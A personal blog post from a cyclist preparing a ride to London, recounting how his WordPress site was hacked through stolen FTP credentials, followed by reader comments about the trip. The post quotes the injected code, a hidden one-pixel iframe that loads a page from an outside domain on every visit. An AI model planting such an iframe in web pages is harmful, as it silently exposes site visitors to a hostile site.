Pre-Departure (105 days): Website hacked


Everyday you learn something new…some frequent visitors to this site may have noticed that for the best part of a week, 14degrees.org was not online. This was due to what I assume was a kind of ‘hacking robot’.

One day I go to access the website, and I got a parse error, which meant that nothing on the site displayed at all. This is actually quite handy, because if my site had been all HTML, I may not have noticed that something was amiss. The reason I got the error is because this site is running on WordPress – a content management software. If any of the files are tampered with in WordPress, the whole thing just stops working.

So to cut a long story short, somehow a hacking program got a hold of my web hosting password and username, and added code into all my webpages. This is the code:

iframe marginwidth=”0″ marginheight=”0″ src=”http://196.regvista.com/index.php?ref=r22″ mce_src=”http://196.regvista.com/index.php?ref=r22″ width=”1″ height=”1″

When a page with this code is opened, crazy stuff happens. The page seems to keep re-loading. It seems as though it is an invisible ad banner than automatically ‘clicks’ repetitively? I dunno. I’m not up with the play with these things.

But anyway, I ended up deleting everything on my web hosting account, and re-installing wordpress (the rouge code was in everything). As you can see things are back to normal again. I’ve still got to clean up some stuff on the Japanese version of the site, but that shouldn’t take long.

The moral of the story is:

  1. Don’t use FTP software. Apparently when they go to access your account, they send the password and username in clear text – not encoded.
  2. If using FTP software (for transfering lots of files in one go) then make sure you change your password immediately after doing the transfer.

The hosting company that I have my website on includes many good features, one of them being a file uploading tool and file editor. I’ll be using this as much as possible in the future, so as to avoid any repeats of last week’s fiasco.


Leave a comment

Your email address will not be published. Required fields are marked *

5 thoughts on “Pre-Departure (105 days): Website hacked

  • carl

    are you really going to cycle that thing? to london? I was just in Japan and you must get some right funny looks…

    Anyway best of luck and I look forward to seeing your progress on the website. Found your site from Ed's blog. Your site looks good and I really wish you all the best.

    regards from darkest surrey

  • Rob Thomson Post author

    Carl, thanks for dropping by. I recognise your name from Ed's blog.

    I do indeed get some funny looks. They make me laugh out loud sometimes.

    No I'm not going to bike to London on it. On the 18th of July I'm going to leave Pusan on it and bike as far as I can on that day. After repeating that for as many days as I can handle, hopefully I'll find myself in London at some stage.

    The thought of biking from here to London freaks me out. The thought of doing a couple hundred day-long bike rides that happen to join up in a line to London doesn't.

    A day at a time.

    There was primary school called Surrey Primary School in my hometown, Invercargill, in New Zealand. It had a cool wobbly bridge in the playground. Maybe even a flying fox.

  • carl

    Well mate best of luck I got funny looks when I cycled around shikoku island between kochi and takamatsu on my mountain bike with everyone else on a sit up and beg job.

    Erm… there was going to some fantastic comment but unfortunatley it's gone due to jet lag and larger. bolox! Oh well catch you later…

    C.

    Ps if you need to find me I sort hang around ed's blog as the company I work for sort of sponsor him. (in a vague and distant manner.)

  • Lee

    Hey, also (to my other comment, somewhere), a paper notebook would also have to be protected from moisture, at least. And mould is a killer.

    Depends on your humidity levels though I s'pose.

    I took a write-in-the-rain waterproof book thingy with me to PNG and never used it, but did have to dry it out a couple of times after taking it on wet excursions. And the pen (though apparently a good one) ran, on the bit where I tested it.

    I guess a notebook (and pen – pencil rubs out by itself sometimes) is less to lose if you get robbed (pardon the pun) blind. But you'll have bigger worries than your blog, if that happens.

    Hmmmm. Food for thought.